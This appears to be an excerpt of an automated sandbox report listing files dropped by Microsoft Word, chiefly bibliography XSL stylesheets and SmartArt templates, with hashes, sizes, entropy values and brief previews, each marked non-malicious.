                                        SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):6024
                                        Entropy (8bit):7.886254023824049
                                        Encrypted:false
                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):332
                                        Entropy (8bit):3.4871192480632223
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                        MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                        SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                        SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                        SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):254875
                                        Entropy (8bit):5.003842588822783
                                        Encrypted:false
                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                        MD5:377B3E355414466F3E3861BCE1844976
                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):3.48087342759872
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                        MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                        SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                        SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                        SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4326
                                        Entropy (8bit):7.821066198539098
                                        Encrypted:false
                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):292
                                        Entropy (8bit):3.5026803317779778
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                        MD5:A0D51783BFEE86F3AC46A810404B6796
                                        SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                        SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                        SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):251032
                                        Entropy (8bit):5.102652100491927
                                        Encrypted:false
                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.5502940710609354
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                        MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                        SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                        SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                        SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):270198
                                        Entropy (8bit):5.073814698282113
                                        Encrypted:false
                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):16806
                                        Entropy (8bit):7.9519793977093505
                                        Encrypted:false
                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):254
                                        Entropy (8bit):3.4720677950594836
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                        MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                        SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                        SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                        SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):332
                                        Entropy (8bit):3.547857457374301
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                        MD5:4EC6724CBBA516CF202A6BD17226D02C
                                        SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                        SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                        SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):284415
                                        Entropy (8bit):5.00549404077789
                                        Encrypted:false
                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                        MD5:33A829B4893044E1851725F4DAF20271
                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):333258
                                        Entropy (8bit):4.654450340871081
                                        Encrypted:false
                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):328
                                        Entropy (8bit):3.541819892045459
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                        MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                        SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                        SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                        SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288
                                        Entropy (8bit):3.523917709458511
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                        MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                        SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                        SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                        SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):296658
                                        Entropy (8bit):5.000002997029767
                                        Encrypted:false
                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):374
                                        Entropy (8bit):3.5414485333689694
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                        MD5:2F7A8FE4E5046175500AFFA228F99576
                                        SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                        SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                        SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):47296
                                        Entropy (8bit):6.42327948041841
                                        Encrypted:false
                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.4670546921349774
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                        MD5:3D52060B74D7D448DC733FFE5B92CB52
                                        SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                        SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                        SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):5630
                                        Entropy (8bit):7.87271654296772
                                        Encrypted:false
                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
